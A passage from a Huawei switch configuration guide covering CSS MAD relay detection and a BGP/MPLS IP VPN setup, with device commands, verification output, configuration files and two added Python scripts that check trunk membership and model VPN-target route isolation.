Eth-Trunk20
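The two verification outputs above (display trunkmembership eth-trunk in Step 5 and display mad in Step 6) can be checked together. MAD in relay mode exchanges its detection packets through the inter-chassis Eth-Trunk and the relay agent, so that Eth-Trunk needs an up member port on each chassis; if all up members sit on one chassis, the other chassis has no path to the relay agent after a CSS split. The following Python script is an added example, not part of this document or of any Huawei tool; it parses both outputs and confirms that condition. Sample outputs are constructed in the format shown above.

```python
"""Check that an Eth-Trunk used for MAD relay spans both CSS chassis and that
MAD relay detection is enabled, from `display trunkmembership eth-trunk` and
`display mad` output. Added example (not Huawei's tooling); the sample output
is constructed in the format shown in this document.
"""
import re
from typing import List, NamedTuple, Optional


class Member(NamedTuple):
    ifname: str
    valid: bool
    oper_up: bool


# "Interface GigabitEthernet1/1/0/4, valid, operate up, weight=1"
_MEMBER = re.compile(r"Interface\s+(\S+?),\s+(\w+),\s+operate\s+(\w+),\s+weight=\d+")


def parse_trunk_members(text: str) -> List[Member]:
    return [Member(m[1], m[2] == "valid", m[3] == "up") for m in _MEMBER.finditer(text)]


def chassis_of(ifname: str) -> Optional[int]:
    """CSS interface names are chassis/slot/subcard/port; return the chassis ID."""
    m = re.search(r"(\d+)/\d+/\d+/\d+$", ifname)
    return int(m[1]) if m else None


def trunk_spans_both_chassis(members: List[Member]) -> bool:
    """True when at least one valid, up member is on chassis 1 and one on chassis 2.

    MAD relay packets travel over this Eth-Trunk to the relay agent; after a
    split, each chassis needs its own up member port to keep that path.
    """
    up_chassis = {chassis_of(m.ifname) for m in members if m.valid and m.oper_up}
    return {1, 2} <= up_chassis


def mad_relay_enabled(display_mad: str) -> bool:
    """Parse the 'MAD relay detection enabled: YES/NO' line of `display mad`."""
    m = re.search(r"MAD relay detection enabled:\s*(YES|NO)", display_mad)
    return bool(m and m[1] == "YES")


# Constructed: Eth-Trunk 20 as configured above, both members up.
TRUNK_OK = """\
Trunk ID: 20
Used status: VALID
TYPE: ethernet
Working Mode : Normal
Number Of Ports in Trunk = 2
Number Of Up Ports in Trunk = 2
Operate status: up

Interface GigabitEthernet1/1/0/3, valid, operate up, weight=1
Interface GigabitEthernet2/1/0/5, valid, operate up, weight=1
"""

# Constructed: the chassis-2 member is down, so only chassis 1 can reach the relay agent.
TRUNK_ONE_CHASSIS = """\
Trunk ID: 20
Number Of Ports in Trunk = 2
Number Of Up Ports in Trunk = 1
Operate status: up

Interface GigabitEthernet1/1/0/3, valid, operate up, weight=1
Interface GigabitEthernet2/1/0/5, valid, operate down, weight=1
"""

MAD_OUTPUT = """\
Current MAD domain: 0
MAD direct detection enabled: NO
MAD relay detection enabled: YES
"""


if __name__ == "__main__":
    for label, text in (("trunk ok", TRUNK_OK), ("one chassis", TRUNK_ONE_CHASSIS)):
        print(label, "spans both chassis:", trunk_spans_both_chassis(parse_trunk_members(text)))
    print("MAD relay enabled:", mad_relay_enabled(MAD_OUTPUT))
```

The Eth-Trunk still reports Operate status: up in the second sample, so the trunk status alone does not reveal that MAD relay has lost its redundancy; the per-member check does.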

----End

Configuration Files
l CSS configuration file
#
sysname CSS
#
interface Eth-Trunk10
#
interface Eth-Trunk20
mad detect mode relay
#
interface Eth-Trunk30
#
interface GigabitEthernet1/1/0/3
eth-trunk 20
#
interface GigabitEthernet1/1/0/4
eth-trunk 10
#
interface GigabitEthernet1/1/0/5
eth-trunk 30
#
interface GigabitEthernet2/1/0/3
eth-trunk 30
#
interface GigabitEthernet2/1/0/4
eth-trunk 10
#
interface GigabitEthernet2/1/0/5
eth-trunk 20
#
return

l SwitchC configuration file
#
sysname SwitchC
#
interface Eth-Trunk20
mad relay
#
interface GigabitEthernet1/0/1
eth-trunk 20
#
interface GigabitEthernet1/0/2
eth-trunk 20
#
return

l SwitchD configuration file
#
sysname SwitchD
#
interface Eth-Trunk30
#
interface GigabitEthernet1/0/1
eth-trunk 30
#
interface GigabitEthernet1/0/2
eth-trunk 30
#
return

l SwitchE configuration file
#
sysname SwitchE
#
interface Eth-Trunk10
#
interface GigabitEthernet1/0/1
eth-trunk 10
#
interface GigabitEthernet1/0/2
eth-trunk 10
#
return

Related Content
Tool
CSS Assistant

14 Typical MPLS&VPN Configuration

About This Chapter

14.1 Typical BGP/MPLS IP VPN Configuration
14.2 Example for Connecting QinQ Termination Sub-interfaces to a VLL Network
14.3 Example for Deploying BGP/MPLS IP VPN and VPLS on One ISP Network

14.1 Typical BGP/MPLS IP VPN Configuration

14.1.1 Example for Configuring BGP/MPLS IP VPN
BGP/MPLS IP VPN Overview
BGP/MPLS IP VPN is an MPLS-based L3VPN. It can be deployed flexibly and extended easily,
which makes it suitable for large-scale deployments: when a new site is added, the network
administrator only needs to modify the configuration of the edge nodes serving the new site.
BGP/MPLS IP VPN is suitable for communication between a headquarters and branches in
different locations. Because communication data must traverse the carrier's backbone
network, BGP is used to advertise VPN routes and MPLS is used to forward VPN packets on
the backbone network. Because different departments of an enterprise need to be isolated,
BGP/MPLS IP VPN implements route isolation, address space isolation, and access isolation
between different VPNs.

Configuration Notes
l The SA series cards do not support the BGP/MPLS IP VPN function. The X1E series
cards of V200R006C00 and later versions support the BGP/MPLS IP VPN function.
l This example applies to all versions of the S12700 switches.
NOTE
For details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 14-1:
l CE1 connects to the headquarters R&D area of a company, and CE3 connects to the
branch R&D area. CE1 and CE3 belong to vpna.
l CE2 connects to the headquarters non-R&D area, and CE4 connects to the branch non-
R&D area. CE2 and CE4 belong to vpnb.
BGP/MPLS IP VPN needs to be deployed for the company to ensure secure communication
between the headquarters and branch while isolating data between the R&D area and non-
R&D area.

Figure 14-1 Networking diagram for configuring BGP/MPLS IP VPN
(The diagram is not reproduced in text; its interface labels are listed below. PE1, P, and
PE2 form the VPN backbone in AS 100.)

Device  AS     Interface   VLANIF    IP address      VPN    Connects to
CE1     65410  GE1/0/0     VLANIF10  10.1.1.1/24     vpna   PE1 GE1/0/0
CE2     65420  GE1/0/0     VLANIF20  10.2.1.1/24     vpnb   PE1 GE2/0/0
CE3     65430  GE1/0/0     VLANIF40  10.3.1.1/24     vpna   PE2 GE1/0/0
CE4     65440  GE1/0/0     VLANIF50  10.4.1.1/24     vpnb   PE2 GE2/0/0
PE1     100    Loopback1   -         1.1.1.9/32      -      -
PE1     100    GE1/0/0     VLANIF10  10.1.1.2/24     vpna   CE1 GE1/0/0
PE1     100    GE2/0/0     VLANIF20  10.2.1.2/24     vpnb   CE2 GE1/0/0
PE1     100    GE3/0/0     VLANIF30  172.1.1.1/24    -      P GE1/0/0
P       100    Loopback1   -         2.2.2.9/32      -      -
P       100    GE1/0/0     VLANIF30  172.1.1.2/24    -      PE1 GE3/0/0
P       100    GE2/0/0     VLANIF60  172.2.1.1/24    -      PE2 GE3/0/0
PE2     100    Loopback1   -         3.3.3.9/32      -      -
PE2     100    GE1/0/0     VLANIF40  10.3.1.2/24     vpna   CE3 GE1/0/0
PE2     100    GE2/0/0     VLANIF50  10.4.1.2/24     vpnb   CE4 GE1/0/0
PE2     100    GE3/0/0     VLANIF60  172.2.1.2/24    -      P GE2/0/0

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure OSPF between the P and PEs to ensure IP connectivity on the backbone
network.
2. Configure basic MPLS capabilities and MPLS LDP on the P and PEs to establish MPLS
LSP tunnels for VPN data transmission on the backbone network.
3. Configure MP-IBGP on PE1 and PE2 to enable them to exchange VPN routing
information.
4. Configure VPN instances vpna and vpnb on PE1 and PE2. Set the VPN target of vpna to
111:1 and the VPN target of vpnb to 222:2. This configuration allows users in the same
VPN to communicate with each other and isolates users on different VPNs. Bind the PE
interfaces connected to CEs to the corresponding VPN instances to provide access for
VPN users.
5. Configure EBGP on the CEs and PEs to exchange VPN routing information.

Procedure
Step 1 Configure an IGP on the MPLS backbone network so that PEs and P can communicate with
each other.
# Configure PE1.

<HUAWEI> system-view
[HUAWEI] sysname PE1
[PE1] interface loopback 1
[PE1-LoopBack1] ip address 1.1.1.9 32
[PE1-LoopBack1] quit
[PE1] vlan batch 10 20 30
[PE1] interface gigabitethernet 1/0/0
[PE1-GigabitEthernet1/0/0] port link-type trunk
[PE1-GigabitEthernet1/0/0] port trunk allow-pass vlan 10
[PE1-GigabitEthernet1/0/0] quit
[PE1] interface gigabitethernet 2/0/0
[PE1-GigabitEthernet2/0/0] port link-type trunk
[PE1-GigabitEthernet2/0/0] port trunk allow-pass vlan 20
[PE1-GigabitEthernet2/0/0] quit
[PE1] interface gigabitethernet 3/0/0
[PE1-GigabitEthernet3/0/0] port link-type trunk
[PE1-GigabitEthernet3/0/0] port trunk allow-pass vlan 30
[PE1-GigabitEthernet3/0/0] quit
[PE1] interface vlanif 30
[PE1-Vlanif30] ip address 172.1.1.1 24
[PE1-Vlanif30] quit
[PE1] ospf 1 router-id 1.1.1.9
[PE1-ospf-1] area 0
[PE1-ospf-1-area-0.0.0.0] network 172.1.1.0 0.0.0.255
[PE1-ospf-1-area-0.0.0.0] network 1.1.1.9 0.0.0.0
[PE1-ospf-1-area-0.0.0.0] quit
[PE1-ospf-1] quit

# Configure P.
<HUAWEI> system-view
[HUAWEI] sysname P
[P] interface loopback 1
[P-LoopBack1] ip address 2.2.2.9 32
[P-LoopBack1] quit
[P] vlan batch 30 60
[P] interface gigabitethernet 1/0/0
[P-GigabitEthernet1/0/0] port link-type trunk
[P-GigabitEthernet1/0/0] port trunk allow-pass vlan 30
[P-GigabitEthernet1/0/0] quit
[P] interface gigabitethernet 2/0/0
[P-GigabitEthernet2/0/0] port link-type trunk
[P-GigabitEthernet2/0/0] port trunk allow-pass vlan 60
[P-GigabitEthernet2/0/0] quit
[P] interface vlanif 30
[P-Vlanif30] ip address 172.1.1.2 24
[P-Vlanif30] quit
[P] interface vlanif 60
[P-Vlanif60] ip address 172.2.1.1 24
[P-Vlanif60] quit
[P] ospf 1 router-id 2.2.2.9
[P-ospf-1] area 0
[P-ospf-1-area-0.0.0.0] network 172.1.1.0 0.0.0.255
[P-ospf-1-area-0.0.0.0] network 172.2.1.0 0.0.0.255
[P-ospf-1-area-0.0.0.0] network 2.2.2.9 0.0.0.0
[P-ospf-1-area-0.0.0.0] quit
[P-ospf-1] quit

# Configure PE2.
<HUAWEI> system-view
[HUAWEI] sysname PE2
[PE2] interface loopback 1
[PE2-LoopBack1] ip address 3.3.3.9 32
[PE2-LoopBack1] quit
[PE2] vlan batch 40 50 60
[PE2] interface gigabitethernet 1/0/0
[PE2-GigabitEthernet1/0/0] port link-type trunk
[PE2-GigabitEthernet1/0/0] port trunk allow-pass vlan 40
[PE2-GigabitEthernet1/0/0] quit

[PE2] interface gigabitethernet 2/0/0
[PE2-GigabitEthernet2/0/0] port link-type trunk
[PE2-GigabitEthernet2/0/0] port trunk allow-pass vlan 50
[PE2-GigabitEthernet2/0/0] quit
[PE2] interface gigabitethernet 3/0/0
[PE2-GigabitEthernet3/0/0] port link-type trunk
[PE2-GigabitEthernet3/0/0] port trunk allow-pass vlan 60
[PE2-GigabitEthernet3/0/0] quit
[PE2] interface vlanif 60
[PE2-Vlanif60] ip address 172.2.1.2 24
[PE2-Vlanif60] quit
[PE2] ospf 1 router-id 3.3.3.9
[PE2-ospf-1] area 0
[PE2-ospf-1-area-0.0.0.0] network 172.2.1.0 0.0.0.255
[PE2-ospf-1-area-0.0.0.0] network 3.3.3.9 0.0.0.0
[PE2-ospf-1-area-0.0.0.0] quit
[PE2-ospf-1] quit

After the configuration is complete, OSPF neighbor relationships are established between PE1
and P, and between PE2 and P. Run the display ospf peer command. The command output
shows that the neighbor status is Full. Run the display ip routing-table command. The
command output shows that PEs have learned the routes to Loopback1 of each other.
The information displayed on PE1 is used as an example.
[PE1] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 8 Routes : 8

Destination/Mask Proto Pre Cost Flags NextHop Interface
1.1.1.9/32 Direct 0 0 D 127.0.0.1 LoopBack1
2.2.2.9/32 OSPF 10 1 D 172.1.1.2 Vlanif30
3.3.3.9/32 OSPF 10 2 D 172.1.1.2 Vlanif30
127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1 InLoopBack0
172.1.1.0/24 Direct 0 0 D 172.1.1.1 Vlanif30
172.1.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif30
172.2.1.0/24 OSPF 10 2 D 172.1.1.2 Vlanif30
[PE1] display ospf peer

OSPF Process 1 with Router ID 1.1.1.9
Neighbors

Area 0.0.0.0 interface 172.1.1.1(Vlanif30)'s neighbors
Router ID: 2.2.2.9 Address: 172.1.1.2
State: Full Mode:Nbr is Master Priority: 1
DR: 172.1.1.2 BDR: 172.1.1.1 MTU: 0
Dead timer due in 37 sec
Retrans timer interval: 5
Neighbor is up for 00:16:21
Authentication Sequence: [ 0 ]

Step 2 Configure basic MPLS capabilities and MPLS LDP on the MPLS backbone network to
establish LDP LSPs.
# Configure PE1.
[PE1] mpls lsr-id 1.1.1.9
[PE1] mpls
[PE1-mpls] quit
[PE1] mpls ldp
[PE1-mpls-ldp] quit
[PE1] interface vlanif 30
[PE1-Vlanif30] mpls
[PE1-Vlanif30] mpls ldp
[PE1-Vlanif30] quit

# Configure P.
[P] mpls lsr-id 2.2.2.9
[P] mpls
[P-mpls] quit
[P] mpls ldp
[P-mpls-ldp] quit
[P] interface vlanif 30
[P-Vlanif30] mpls
[P-Vlanif30] mpls ldp
[P-Vlanif30] quit
[P] interface vlanif 60
[P-Vlanif60] mpls
[P-Vlanif60] mpls ldp
[P-Vlanif60] quit

# Configure PE2.
[PE2] mpls lsr-id 3.3.3.9
[PE2] mpls
[PE2-mpls] quit
[PE2] mpls ldp
[PE2-mpls-ldp] quit
[PE2] interface vlanif 60
[PE2-Vlanif60] mpls
[PE2-Vlanif60] mpls ldp
[PE2-Vlanif60] quit

After the configuration is complete, LDP sessions are established between PE1 and the P and
between the P and PE2. Run the display mpls ldp session command. The command output
shows that the Status field is Operational. Run the display mpls ldp lsp command.
Information about the established LDP LSPs is displayed.
The information displayed on PE1 is used as an example.
[PE1] display mpls ldp session

LDP Session(s) in Public Network
Codes: LAM(Label Advertisement Mode), SsnAge Unit(DDDD:HH:MM)
A '*' before a session means the session is being deleted.
------------------------------------------------------------------------------
PeerID Status LAM SsnRole SsnAge KASent/Rcv
------------------------------------------------------------------------------
2.2.2.9:0 Operational DU Passive 0000:00:01 6/6
------------------------------------------------------------------------------
TOTAL: 1 session(s) Found.

[PE1] display mpls ldp lsp

LDP LSP Information
-------------------------------------------------------------------------------
Flag after Out IF: (I) - LSP Is Only Iterated by RLFA
-------------------------------------------------------------------------------
DestAddress/Mask In/OutLabel UpstreamPeer NextHop OutInterface
-------------------------------------------------------------------------------
1.1.1.9/32 3/NULL 2.2.2.9 127.0.0.1 InLoop0
*1.1.1.9/32 Liberal/1024 DS/2.2.2.9
2.2.2.9/32 NULL/3 - 172.1.1.2 Vlanif30
2.2.2.9/32 1024/3 2.2.2.9 172.1.1.2 Vlanif30
3.3.3.9/32 NULL/1025 - 172.1.1.2 Vlanif30
3.3.3.9/32 1025/1025 2.2.2.9 172.1.1.2 Vlanif30
-------------------------------------------------------------------------------
TOTAL: 5 Normal LSP(s) Found.
TOTAL: 1 Liberal LSP(s) Found.
TOTAL: 0 Frr LSP(s) Found.
A '*' before an LSP means the LSP is not established
A '*' before a Label means the USCB or DSCB is stale
A '*' before a UpstreamPeer means the session is stale
A '*' before a DS means the session is stale
A '*' before a NextHop means the LSP is FRR LSP

Step 3 Configure VPN instances on PEs and bind the interfaces connected to CEs to the VPN
instances.

# Configure PE1.
[PE1] ip vpn-instance vpna
[PE1-vpn-instance-vpna] route-distinguisher 100:1
[PE1-vpn-instance-vpna-af-ipv4] vpn-target 111:1 both
[PE1-vpn-instance-vpna-af-ipv4] quit
[PE1-vpn-instance-vpna] quit
[PE1] ip vpn-instance vpnb
[PE1-vpn-instance-vpnb] route-distinguisher 100:2
[PE1-vpn-instance-vpnb-af-ipv4] vpn-target 222:2 both
[PE1-vpn-instance-vpnb-af-ipv4] quit
[PE1-vpn-instance-vpnb] quit
[PE1] interface vlanif 10
[PE1-Vlanif10] ip binding vpn-instance vpna
[PE1-Vlanif10] ip address 10.1.1.2 24
[PE1-Vlanif10] quit
[PE1] interface vlanif 20
[PE1-Vlanif20] ip binding vpn-instance vpnb
[PE1-Vlanif20] ip address 10.2.1.2 24
[PE1-Vlanif20] quit

# Configure PE2.
[PE2] ip vpn-instance vpna
[PE2-vpn-instance-vpna] route-distinguisher 200:1
[PE2-vpn-instance-vpna-af-ipv4] vpn-target 111:1 both
[PE2-vpn-instance-vpna-af-ipv4] quit
[PE2-vpn-instance-vpna] quit
[PE2] ip vpn-instance vpnb
[PE2-vpn-instance-vpnb] route-distinguisher 200:2
[PE2-vpn-instance-vpnb-af-ipv4] vpn-target 222:2 both
[PE2-vpn-instance-vpnb-af-ipv4] quit
[PE2-vpn-instance-vpnb] quit
[PE2] interface vlanif 40
[PE2-Vlanif40] ip binding vpn-instance vpna
[PE2-Vlanif40] ip address 10.3.1.2 24
[PE2-Vlanif40] quit
[PE2] interface vlanif 50
[PE2-Vlanif50] ip binding vpn-instance vpnb
[PE2-Vlanif50] ip address 10.4.1.2 24
[PE2-Vlanif50] quit
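The isolation promised in item 4 of the configuration roadmap comes entirely from the VPN targets configured in this step: a PE attaches its export VPN target to every route it advertises from a VPN instance, and a receiving PE imports a VPNv4 route into an instance only when the route carries one of that instance's import VPN targets. The route distinguisher only keeps identical prefixes from different VPNs apart in the VPNv4 table; it takes no part in the import decision. The following Python model is an added example, not Huawei code, that reproduces this decision with the RDs, VPN targets, PE loopbacks and CE subnets of this example, and then shows what a constructed misconfiguration (vpnb on PE2 importing 111:1 as well) would leak.

```python
"""Model of VPN-target filtering in BGP/MPLS IP VPN.

Added example (not Huawei code). Reproduces the import/export decision that
the VPN-instance configuration relies on, so the effect of the VPN targets
(111:1 for vpna, 222:2 for vpnb) can be checked before deployment. Device
names, RDs, prefixes and VPN targets are the ones used in this example; the
leak scenario at the end is constructed.
"""
from dataclasses import dataclass, replace
from typing import Dict, FrozenSet, List, Set, Tuple


@dataclass(frozen=True)
class VpnInstance:
    pe: str
    name: str
    rd: str                     # route-distinguisher, unique per PE and instance
    import_rts: FrozenSet[str]  # vpn-target ... import-extcommunity
    export_rts: FrozenSet[str]  # vpn-target ... export-extcommunity


@dataclass(frozen=True)
class Vpnv4Route:
    rd: str
    prefix: str
    rts: FrozenSet[str]  # extended communities attached at export
    next_hop: str        # loopback of the advertising PE
    origin_vpn: str      # bookkeeping for this model only; not carried in BGP


def export_routes(inst: VpnInstance, prefixes: List[str], next_hop: str) -> List[Vpnv4Route]:
    """A PE prepends the instance RD and attaches the export RTs to each local VPN route."""
    return [Vpnv4Route(inst.rd, p, inst.export_rts, next_hop, inst.name) for p in prefixes]


def vpnv4_table(routes: List[Vpnv4Route]) -> Dict[Tuple[str, str], Vpnv4Route]:
    """The RD makes (rd, prefix) unique even if two VPNs reuse the same IPv4 prefix."""
    return {(r.rd, r.prefix): r for r in routes}


def import_routes(inst: VpnInstance, table: Dict[Tuple[str, str], Vpnv4Route]) -> Set[str]:
    """policy vpn-target: a route is imported only if it carries at least one RT
    that the instance imports. The RD plays no part in this decision."""
    return {r.prefix for r in table.values() if r.rts & inst.import_rts}


def leaks(instances: List[VpnInstance], table) -> List[Tuple[str, str]]:
    """(instance, prefix) pairs where a prefix exported by a different VPN would be imported."""
    found = [(f"{i.pe}/{i.name}", r.prefix)
             for i in instances for r in table.values()
             if r.rts & i.import_rts and r.origin_vpn != i.name]
    return sorted(found)


# VPN instances exactly as configured in Step 3 (vpn-target ... both = import and export).
PE1_VPNA = VpnInstance("PE1", "vpna", "100:1", frozenset({"111:1"}), frozenset({"111:1"}))
PE1_VPNB = VpnInstance("PE1", "vpnb", "100:2", frozenset({"222:2"}), frozenset({"222:2"}))
PE2_VPNA = VpnInstance("PE2", "vpna", "200:1", frozenset({"111:1"}), frozenset({"111:1"}))
PE2_VPNB = VpnInstance("PE2", "vpnb", "200:2", frozenset({"222:2"}), frozenset({"222:2"}))

# Constructed misconfiguration: vpnb on PE2 also imports vpna's target.
PE2_VPNB_LEAKY = replace(PE2_VPNB, import_rts=frozenset({"222:2", "111:1"}))

# CE-facing subnets from Figure 14-1 (advertised with import-route direct in Step 4).
LOCAL_PREFIXES = {
    ("PE1", "vpna"): ["10.1.1.0/24"], ("PE1", "vpnb"): ["10.2.1.0/24"],
    ("PE2", "vpna"): ["10.3.1.0/24"], ("PE2", "vpnb"): ["10.4.1.0/24"],
}
PE_LOOPBACKS = {"PE1": "1.1.1.9", "PE2": "3.3.3.9"}


def build_table(instances=(PE1_VPNA, PE1_VPNB, PE2_VPNA, PE2_VPNB)):
    """The VPNv4 table as seen after both PEs have exchanged routes over MP-IBGP."""
    routes: List[Vpnv4Route] = []
    for inst in instances:
        routes += export_routes(inst, LOCAL_PREFIXES[(inst.pe, inst.name)], PE_LOOPBACKS[inst.pe])
    return vpnv4_table(routes)


if __name__ == "__main__":
    table = build_table()
    for inst in (PE2_VPNA, PE2_VPNB, PE2_VPNB_LEAKY):
        print(f"{inst.pe}/{inst.name} imports {sorted(import_routes(inst, table))}")
    print("leaks with the documented targets:", leaks([PE1_VPNA, PE1_VPNB, PE2_VPNA, PE2_VPNB], table))
    print("leaks with the constructed misconfiguration:", leaks([PE2_VPNB_LEAKY], table))
```

With the documented targets, vpna on PE2 imports only 10.1.1.0/24 from PE1 (plus its own 10.3.1.0/24), which is exactly what the display ip routing-table vpn-instance output in Step 6 shows; the leak list is empty. Adding 111:1 to vpnb's import list is enough to pull the R&D subnets into the non-R&D VRF, which is why import VPN targets deserve the same review as an ACL change.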

# Assign IP addresses to the interfaces on CE1, which connects to the headquarters R&D area,
according to Figure 14-1. The configuration on CE2, CE3, and CE4 is similar to the
configuration on CE1 and is not provided here.
<HUAWEI> system-view
[HUAWEI] sysname CE1
[CE1] vlan batch 10
[CE1] interface gigabitethernet 1/0/0
[CE1-GigabitEthernet1/0/0] port link-type trunk
[CE1-GigabitEthernet1/0/0] port trunk allow-pass vlan 10
[CE1-GigabitEthernet1/0/0] quit
[CE1] interface vlanif 10
[CE1-Vlanif10] ip address 10.1.1.1 24
[CE1-Vlanif10] quit

After the configuration is complete, run the display ip vpn-instance verbose command on
the PEs to check the configuration of VPN instances. Each PE can ping its connected CE.

NOTE
If a PE has multiple interfaces bound to the same VPN instance, specify a source IP address by setting
-a source-ip-address in the ping -vpn-instance vpn-instance-name -a source-ip-address dest-ip-address
command to ping the remote CE. If the source IP address is not specified, the ping fails.

PE1 is used as an example.
[PE1] display ip vpn-instance verbose
Total VPN-Instances configured : 2
Total IPv4 VPN-Instances configured : 2
Total IPv6 VPN-Instances configured : 0

VPN-Instance Name and ID : vpna, 1
Interfaces : Vlanif10
Address family ipv4
Create date : 2014-11-03 02:39:34+00:00
Up time : 0 days, 22 hours, 24 minutes and 53 seconds
Route Distinguisher : 100:1
Export VPN Targets : 111:1
Import VPN Targets : 111:1
Label Policy : label per instance
Per-Instance Label : 4098
Log Interval : 5

VPN-Instance Name and ID : vpnb, 2
Interfaces : Vlanif20
Address family ipv4
Create date : 2014-11-03 02:39:34+00:00
Up time : 0 days, 22 hours, 24 minutes and 53 seconds
Route Distinguisher : 100:2
Export VPN Targets : 222:2
Import VPN Targets : 222:2
Label Policy : label per instance
Per-Instance Label : 4098
Log Interval : 5

[PE1] ping -vpn-instance vpna 10.1.1.1
PING 10.1.1.1: 56 data bytes, press CTRL_C to break
Reply from 10.1.1.1: bytes=56 Sequence=1 ttl=255 time=5 ms
Reply from 10.1.1.1: bytes=56 Sequence=2 ttl=255 time=3 ms
Reply from 10.1.1.1: bytes=56 Sequence=3 ttl=255 time=3 ms
Reply from 10.1.1.1: bytes=56 Sequence=4 ttl=255 time=3 ms
Reply from 10.1.1.1: bytes=56 Sequence=5 ttl=255 time=16 ms

--- 10.1.1.1 ping statistics ---
5 packet(s) transmitted
5 packet(s) received
0.00% packet loss
round-trip min/avg/max = 3/6/16 ms

Step 4 Establish EBGP peer relationships between PEs and CEs and import VPN routes into BGP.
# Configure CE1 connecting to the headquarters R&D area. The configuration on CE2, CE3,
and CE4 is similar to the configuration on CE1 and is not mentioned here.
[CE1] bgp 65410
[CE1-bgp] peer 10.1.1.2 as-number 100
[CE1-bgp] import-route direct
[CE1-bgp] quit

# Configure PE1. The configuration on PE2 is similar to the configuration on PE1 and is not
mentioned here.
[PE1] bgp 100
[PE1-bgp] ipv4-family vpn-instance vpna
[PE1-bgp-vpna] peer 10.1.1.1 as-number 65410
[PE1-bgp-vpna] import-route direct
[PE1-bgp-vpna] quit

[PE1-bgp] ipv4-family vpn-instance vpnb
[PE1-bgp-vpnb] peer 10.2.1.1 as-number 65420
[PE1-bgp-vpnb] import-route direct
[PE1-bgp-vpnb] quit
[PE1-bgp] quit

After the configuration is complete, run the display bgp vpnv4 vpn-instance peer command
on the PEs. The command output shows that BGP peer relationships have been established
between the PEs and CEs.
The peer relationship between PE1 and CE1 is used as an example.
[PE1] display bgp vpnv4 vpn-instance vpna peer

BGP local router ID : 1.1.1.9
Local AS number : 100
VPN-Instance vpna, Router ID 1.1.1.9:
Total number of peers : 1 Peers in established state : 1

Peer V AS MsgRcvd MsgSent OutQ Up/Down State PrefRcv
10.1.1.1 4 65410 11 9 0 00:07:25 Established 1

Step 5 Establish MP-IBGP peer relationships between PEs.
# Configure PE1.
[PE1] bgp 100
[PE1-bgp] peer 3.3.3.9 as-number 100
[PE1-bgp] peer 3.3.3.9 connect-interface loopback 1
[PE1-bgp] ipv4-family vpnv4
[PE1-bgp-af-vpnv4] peer 3.3.3.9 enable
[PE1-bgp-af-vpnv4] quit
[PE1-bgp] quit

# Configure PE2.
[PE2] bgp 100
[PE2-bgp] peer 1.1.1.9 as-number 100
[PE2-bgp] peer 1.1.1.9 connect-interface loopback 1
[PE2-bgp] ipv4-family vpnv4
[PE2-bgp-af-vpnv4] peer 1.1.1.9 enable
[PE2-bgp-af-vpnv4] quit
[PE2-bgp] quit

After the configuration is complete, run the display bgp peer or display bgp vpnv4 all peer
command on the PEs. The command output shows that BGP peer relationships have been
established between the PEs.
[PE1] display bgp peer

BGP local router ID : 1.1.1.9
Local AS number : 100
Total number of peers : 1 Peers in established state : 1

Peer V AS MsgRcvd MsgSent OutQ Up/Down State PrefRcv
3.3.3.9 4 100 12 6 0 00:02:21 Established 0
[PE1] display bgp vpnv4 all peer

BGP local router ID : 1.1.1.9
Local AS number : 100
Total number of peers : 3 Peers in established state : 3

Peer V AS MsgRcvd MsgSent OutQ Up/Down State PrefRcv
3.3.3.9 4 100 12 18 0 00:09:38 Established 0

Peer of IPv4-family for vpn instance :

VPN-Instance vpna, Router ID 1.1.1.9:
10.1.1.1 4 65410 25 25 0 00:17:57 Established 1
VPN-Instance vpnb, Router ID 1.1.1.9:
10.2.1.1 4 65420 21 22 0 00:17:10 Established 1

Step 6 Verify the configuration.
Run the display ip routing-table vpn-instance command on the PEs to view the routes to the
remote CEs.
The information displayed on PE1 is used as an example.
[PE1] display ip routing-table vpn-instance vpna
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: vpna
Destinations : 3 Routes : 3

Destination/Mask Proto Pre Cost Flags NextHop Interface
10.1.1.0/24 Direct 0 0 D 10.1.1.2 Vlanif10
10.1.1.2/32 Direct 0 0 D 127.0.0.1 Vlanif10
10.3.1.0/24 IBGP 255 0 RD 3.3.3.9 Vlanif30
[PE1] display ip routing-table vpn-instance vpnb
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: vpnb
Destinations : 3 Routes : 3

Destination/Mask Proto Pre Cost Flags NextHop Interface
10.2.1.0/24 Direct 0 0 D 10.2.1.2 Vlanif20
10.2.1.2/32 Direct 0 0 D 127.0.0.1 Vlanif20
10.4.1.0/24 IBGP 255 0 RD 3.3.3.9 Vlanif30

CEs in the same VPN can ping each other, whereas CEs in different VPNs cannot.
For example, CE1 connecting to the headquarters R&D area can ping CE3 connecting to the
branch R&D area at 10.3.1.1 but cannot ping CE4 connecting to the branch non-R&D area at
10.4.1.1.
[CE1] ping 10.3.1.1
PING 10.3.1.1: 56 data bytes, press CTRL_C to break
Reply from 10.3.1.1: bytes=56 Sequence=1 ttl=253 time=72 ms
Reply from 10.3.1.1: bytes=56 Sequence=2 ttl=253 time=34 ms
Reply from 10.3.1.1: bytes=56 Sequence=3 ttl=253 time=50 ms
Reply from 10.3.1.1: bytes=56 Sequence=4 ttl=253 time=50 ms
Reply from 10.3.1.1: bytes=56 Sequence=5 ttl=253 time=34 ms
--- 10.3.1.1 ping statistics ---
5 packet(s) transmitted
5 packet(s) received
0.00% packet loss
round-trip min/avg/max = 34/48/72 ms

----End

Configuration Files
l Configuration file of PE1
#
sysname PE1
#
vlan batch 10 20 30
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 100:1
vpn-target 111:1 export-extcommunity
vpn-target 111:1 import-extcommunity
#
ip vpn-instance vpnb
ipv4-family
route-distinguisher 100:2
vpn-target 222:2 export-extcommunity
vpn-target 222:2 import-extcommunity
#
mpls lsr-id 1.1.1.9
mpls
#
mpls ldp
#
interface Vlanif10
ip binding vpn-instance vpna
ip address 10.1.1.2 255.255.255.0
#
interface Vlanif20
ip binding vpn-instance vpnb
ip address 10.2.1.2 255.255.255.0
#
interface Vlanif30
ip address 172.1.1.1 255.255.255.0
mpls
mpls ldp
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet2/0/0
port link-type trunk
